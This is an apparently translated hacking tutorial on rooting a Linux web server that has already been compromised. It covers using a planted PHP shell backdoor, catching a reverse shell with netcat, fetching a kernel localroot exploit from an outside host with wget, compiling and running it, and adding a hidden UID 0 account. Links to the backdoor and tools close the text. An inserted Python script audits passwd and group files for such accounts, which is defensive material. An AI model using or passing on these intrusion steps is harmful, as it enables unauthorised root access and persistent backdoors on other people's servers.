What is needed:
- Computers & Coffee (hahaha...)
- A target site that has already been injected with a "shell backdoor"
- Localroot exploit tools
- netcat
Open the PHP shell on the previously hacked website where the "php shell" backdoor was installed.
Example: http://www.situstargetyangtelahdihack.com/path/dir/shell.php
Will look like below:
The next step is to find out which kernel the server is running. This information is usually shown in the "shell backdoor"; in the example above it is:
Linux 2.6.18-8.el5 somerandomhosting.com #1 SMP Fri January 26 14:15:21 EST 2007 i686
Or you can run the command: uname -a
From the information above we know that the kernel is: 2.6.18-8 i686
Once the kernel information is known, the next step is to find a "LocalRoot Exploit" tool that is suitable for the above kernel. Obtain a localroot for this kernel: 2.6.18-8.el5 #1 SMP Fri January 26 14:15:21 EST 2007 i686.
Here we are only looking for the localroot exploit; incidentally, there is a large list of them: localroot.th3-0utl4ws
download here
2 - Back-Connecting from the Server to the Attacker's Computer
As noted earlier, what is needed in this case is:
- Netcat Tools (must be installed on the computer)
- Open ports (ports that are open automatically)
Open netcat and run the following command; in this example the port to be used is 443:
C:\WINDOWS\system32\cmd.exe - nc -l -n -v -p 443
Then press "Enter".
The message "Listening on [any] 443 ..." will then appear.
After that, we return to the "shell backdoor" we planted.
Find the "Back Connect" function, then enter the IP and port.
For example, our IP: 10.10.10.10 and port: 443, as shown below:
We run the command "Connect"
If it succeeds, the connection will appear in our command-line window, which means the back connect was successful.
3 - Downloading & Executing the Exploit
We will need the localroot exploit, which can be downloaded from the link mentioned above. Some ways to do this are:
1) Using "wget / cURL"
2) Uploading it manually from the shell
Since "wget" works on this server, download the localroot exploit using "wget".
Okay, simply copy the download link of the right localroot exploit:
Download Tools Localroot collection of Th3-0utl4ws
download the local root
To download the tools above just type the command: wget http://localroot.th3-0utl4ws.com/xploits/2.6.18-164.zip
Once it is downloaded, extract the "local root tools"; this can be done with the command "unzip" or "untar" or "tar".
In the example above, the localroot exploit has been downloaded and extracted:
unzip prct1.c.zip
The next step is to compile the localroot exploit. Because it is written in "C", use the GCC command:
gcc -o PRC prct1.c
Then run:
./PRC
Note: If it fails and an error occurs, you should use another "local root" exploit tool. (DO NOT GIVE UP!)
The above still fails, so do it again and look for another exploit!
Unzip another localroot exploit file: unzip 2.6.18-164.zip
Well, the localroot exploit above is very suitable for this kernel: ("2.6.18-164")
Since this file is already in compiled form and can be executed, run it right away, and do not forget to change the permissions to "777", as in the following example:
chmod 777 2.6.18-164
Then run the exploit:
./2.6.18-164
To check whether we've managed to get root access, check with the following command:
id
or
whoami
You've got root access, congrats!
4 - Adding a New Root User
Adding a user with root-level access is easy; simply use the following command. For example, we will add the root-access user "Haxorfortutorial":
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M Haxorfortutorial
Explanation of the command:
adduser - basic Linux command to add a user
-u 0 -o - set the user ID to zero (0), i.e. root.
-g 0 - set the initial group to ID zero (0), root.
-G 0,1,2,3,4,6,10 - set the additional groups to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel
-M - do not create a 'home directory' for the user.
Haxorfortutorial - User name of the new user account.
Note: Change the user Haxorfortutorial to whatever username you want; this is just an example :)
Next, set a password for the user that we created.
The command:
passwd Haxorfortutorial
Example of implementation:
[root@fedora ~]# passwd Haxorfortutorial
Changing password for user Haxorfortutorial.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
id Haxorfortutorial
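Seen from the defender's side, the account created in step 4 stands out in /etc/passwd and /etc/group. The following is an added example, not part of the original tutorial: it audits passwd- and group-format text for non-root UID 0 accounts and other non-unique UIDs (what -u 0 -o produces) and lists the privileged groups such an account was added to. The function names and sample file contents are constructed for illustration.

```python
from collections import defaultdict

# Supplementary GIDs passed to -G in step 4, with the names the page gives them.
PRIV_GIDS = {0: "root", 1: "bin", 2: "daemon", 3: "sys", 4: "adm", 6: "disk", 10: "wheel"}
# Constructed sample files: a small system plus the account created in step 4.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
alice:x:500:500::/home/alice:/bin/bash
Haxorfortutorial:x:0:0::/home/Haxorfortutorial:/bin/bash
"""
SAMPLE_GROUP = """\
root:x:0:root,Haxorfortutorial
disk:x:6:root,Haxorfortutorial
wheel:x:10:root,alice,Haxorfortutorial
users:x:100:alice
"""

def rows(text, nfields):
    """Yield colon-split records, skipping blank, comment and malformed lines."""
    for line in text.splitlines():
        rec = line.strip().split(":")
        if len(rec) == nfields and not line.startswith("#") and rec[2].isdigit():
            yield rec

def audit(passwd_text, group_text):
    """Return {account: [findings]} for the account pattern created in step 4."""
    by_uid, priv = defaultdict(list), defaultdict(list)
    for name, _pw, uid, *_rest in rows(passwd_text, 7):
        by_uid[int(uid)].append(name)
    for gname, _pw, gid, members in rows(group_text, 4):
        if int(gid) in PRIV_GIDS:
            for member in filter(None, members.split(",")):
                priv[member].append(gname)
    findings = defaultdict(list)
    for uid, names in by_uid.items():
        for name in names:
            if uid == 0 and name != "root":
                findings[name].append("UID 0 on a non-root account")
            elif uid != 0 and len(names) > 1:
                findings[name].append(f"non-unique UID {uid}")
    for name in findings:  # context for the reviewer: extra privileged groups
        if priv.get(name):
            findings[name].append("privileged groups: " + ",".join(sorted(priv[name])))
    return dict(findings)

if __name__ == "__main__":
    for account, notes in audit(SAMPLE_PASSWD, SAMPLE_GROUP).items():
        print(account, "->", "; ".join(notes))
```

On a live host, pass the contents of /etc/passwd and /etc/group to audit(); any result other than an empty dict deserves review.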
GNY shell backdoor - http://privatepaste.com/1321f97984
Tools Netcat - http://downloadnetcat.com/nc11nt.zip
That concludes this short tutorial on how to root a server easily; may your rooting always succeed!